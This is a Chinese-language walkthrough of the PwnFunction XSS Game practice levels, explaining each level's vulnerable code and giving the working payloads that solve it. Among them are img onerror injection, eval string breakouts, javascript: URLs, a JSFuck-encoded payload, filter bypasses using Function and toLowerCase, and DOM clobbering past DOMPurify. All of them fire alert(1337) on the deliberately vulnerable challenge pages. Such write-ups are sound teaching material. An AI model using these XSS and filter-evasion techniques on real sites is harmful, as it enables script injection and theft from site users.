XSS的一些相关案例及DOM破坏的案例

目录

 Ma Spaghet!

Jefff

Ugandan Knuckles

Ricardo Milos

Ah That's Hawt

Ligma

Mafia

Ok, Boomer(DOM破坏)

---

网址：XSS Game - Learning XSS Made Simple! | Created by PwnFunction

 Ma Spaghet!

来分析一下代码

就是一个URL类里进行一个get接收参数(somebody)如果没参数就默认接收(Somebody)这个参数，然后把它放进innerHTML里面去，然后再调用进h2标签中。

因为我看见了innerHTML，它禁用了一个方法也就是<script>标签，但也只限制了它一个标签,我们可以用<img>标签去编写

?somebody=<img%20src=1%20onerror="alert(1337)">

Jefff

先get传参，传入一个jeff如果没有传参就默然传参JEFFF

然后设置一个空值ma，然后再命令执行`ma=”Ma name ${jeff}”`，最后设置一个定时器，ma将值赋值给h2标签

这道题跟上一道不一样，上一道用的是innerHTML安全系数明显比较低，因为它不能将标签也解析出来输出到页面中去，而这一道题innerText可以将标签也解析出来

?jeff=aaa";alert(1337);"

这个思路我们可以带进源代码看看无非就是这样

Eval(ma=”Ma name ${jeff}”)

Eval(`ma=”Ma name aaa";alert(1337);""`)

或者这样使用-，这是连接符

?jeff="-alert(1337)-"

Ugandan Knuckles

无非就是过滤掉我的<>这个符号

Input里面有一个用户传递的值，只需将双引号闭合就是写上<script>,但是<>被过滤了。所以现在能使用点击事件onclick函数，或者onfocus函数，自动就加个autofocus函数

?wey=aaa"%20onfocus=alert(1337)%20autofocus="

Ricardo Milos

先分析一下代码，我发现了submmit这个提交事件，然后这个是在定时器里的，它获取了from表单的id，然后在两秒钟里面进行action的自动提交，而这个action正是from表单action属性。

然后action属性里面的内容可以直接写Js的语句，例如：

有了以上的例子，我们发现这个自动提交不会有这个麻烦，而且我们直接写在传参里面就可以了这个js语句

注意：它里面有个默认action提交到本地也就是那个#，两秒会自动出现，那么后面输入以下参数记得把提交到本地那个?milos=True#删掉再写下面这段代码

?ricardo=JavaScript:alert(1337)

Ah That's Hawt

分析一下代码，它过滤掉了( 、) 、` 和 \ 然后再使用innerHTML将它放到h2标签中去了。

因为使用到了innerHTML我就想到了第一关那种解法

?somebody=<img%20src=1%20οnerrοr="alert(1337)">

我发现它居然过滤掉了()那么函数就使用不了了

于是我就想到了用URLcode去转意一哈

先使用%28%29，发现结果与之前相同

于是我就想到了用URLcode去转意一哈,也就是先将%转换成%25然后(转换成%28)%29

发现不知道为什么%28%29没有转意

我就想到先用loction将它先变成字符串然后再执行，但是前面必须先要写上协议，才能执行后面的参数

?markassbrownlee=<img%20src=1%20onerror=location="JavaScript:alert%25281337%2529">

Ligma

我发现它字母数字不能使用了，只能使用编码的方式去绕过了

然后这里需要我们去一个网站：JSFuck - Write any JavaScript with 6 Characters: []()!+

我们直接拿过来是不行的，必须先要通过URLcoden编码才行

然后?balls=拿到的那一长串urlcode的编码

?balls=%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D((!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%2B%5B!%5B%5D%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(%2B(!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D))%5B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%2B%5B%5D)%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%5B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B((%2B%5B%5D)%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%5D(!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%5D)%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D)()((!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%2B%5B%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(%5B%2B%5B%5D%5D%2B!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D)

Mafia

过滤的东西明显就比较多，有`  、'  、 " 、+ 、\ 、[] 

然后还限制长度50个字符

还过滤了特殊字符alter

突然感觉换个函数就可以了confirm(1337)

?mafia=confirm(1337)

感觉明显没什么意义

我寻思着如果那三个函数全过滤掉了，那么我该如何去解决呢?

我想起了function构造匿名函数，如果我使用Function()()也就是说去直接执行function()这个函数这个括号里面可以写我要去执行的内容

然后我就写了Function(/alert(1337)/)()

但是我又发现它过滤了alert，但是我想起可以使用大写啊可以绕过去

我又改为了Function(/ALERT(1337)/)()

我学xss的时候翻阅了资料知道了JS严格区分大小写还有就是JS不能编码符号

但是我们可以定义函数的，于是我去查阅了相关的官方手册，看看有没有什么能转小写的函数方法

于是我查到了toLowerCase()

现在改为了Function(/ALERT(1337)/.source.toLowerCase())()

// 匿名函数
?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

同时也可以使用数字转字符串，将30进制的数字8680439转换成字符串，就是alert

eval(8680439..toString(30))(1337)

在URL后面加上 #alert(1337)

eval(location.hash.slice(1))

Ok, Boomer(DOM破坏)

我们发现居然存在DOMPurify.sanitize居然存在过滤框架，基本上绕不过，但是我们可以在

网上查一下这个框架的源码，发现之前写的危险函数和代码都用不到

只能往下考虑了，然后我发现哈这个ok这个参数好像没有，我等了两秒发现没有ok的弹出

先进入页面看一下

确定了ok确实没有这个参数，我们能不能构造一个ok呢？

在⽆法直接 XSS的情况下，我们就可以往 DOM Clobbering 这⽅向考虑了。 然后我发现可以使用Dom Clobbering

什么是Dom Clobbering?

例如：

我们发现居然取一个id它居然直接把整个标签都取出来了，这就是弱类型语言嘛

当然这个只是一部分，还有就是：

这个步骤是

先取出cookie，发现没有东西

首先创建一个元素是div

然后再给div赋值

然后再给这个div插入到boby中去

然后再去取出cookie，然后发现将div里面的包含cookie的值取出来了，弱类型语言取值本来取标签名，结果把整个标签取了出来

可以写一个html代码到网页上面去看看

无非就是将body下面的appendChild里面的元素转换成了字符串

然后再分析

Object.getOwnPropertyNames(window) //获取到了window下所以的属性名字

.filter(p=>p.match(/Element$/)) //过滤以获取后缀带element的

.map(p=>window[p]) //然后我把这个属性名称里面的值取出来

.filter(p=>p &&p.prototype &&p.prototype.toString

!== Object.prototype.toString)//然后这个p必须有prototype这个属性而且它这个属性上面还必须有tostring这个方法，并且不能是继承object这个上面的方法，必须是自身的

取出来两个值

我们明显发现这个第二个值就是a标签，我们都可以利⽤href 属性来进⾏字符串转换

我们去查相关文档发现

发现这个定时器可以把函数当成字符串然后去执行

那就好办了，a标签的href可以替换成字符串，然后定时器去执行，但是我们还得绕过那个框架

?boomer=<a%20id=ok%20href=mailto:alert(1337)>
?boomer=<a%20id=ok%20href=tel:alert(1337)>

boomer通过赋值，这个ok就先进带h2标签里面去了。然后就通过下面那个定时器通过id=ok把我传进去的a标签获取到了，但是由于获取到以后定时器就会在两秒后调用tostring方法，所以自己调用href里面的属性整个就会被当做字符串去执行了